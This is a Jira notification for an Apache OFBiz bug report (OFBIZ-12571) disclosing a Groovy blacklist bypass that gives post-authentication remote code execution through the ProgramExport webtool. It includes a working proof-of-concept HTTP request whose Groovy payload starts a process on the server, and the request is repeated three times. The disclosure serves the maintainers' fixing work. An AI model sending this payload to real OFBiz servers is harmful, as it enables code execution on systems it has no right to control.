You are viewing a plain text version of this content. The canonical link for it is here.
Posted to notifications@ofbiz.apache.org by "Y4er (Jira)" <ji...@apache.org> on 2022/02/10 09:53:00 UTC
[jira] [Updated] (OFBIZ-12571) groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
[ https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Y4er updated OFBIZ-12571:
-------------------------
Description:
groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
{code:java}
POST /webtools/control/ProgramExport HTTP/1.1
Host: 192.168.1.178:8443
Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 68
groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
!image-2022-02-10-17-50-58-914.png|width=751,height=407!
was:
groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
{code:java}
POST /webtools/control/ProgramExport HTTP/1.1
Host: 192.168.1.178:8443
Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 68
groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
!image-2022-02-10-17-50-58-914.png!
> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
> Key: OFBIZ-12571
> URL: https://issues.apache.org/jira/browse/OFBIZ-12571
> Project: OFBiz
> Issue Type: Bug
> Components: framework/webtools
> Affects Versions: 18.12.05
> Environment: ofbiz 18.12.05
> Reporter: Y4er
> Priority: Major
> Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
>
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!
--
This message was sent by Atlassian Jira
(v8.20.1#820001)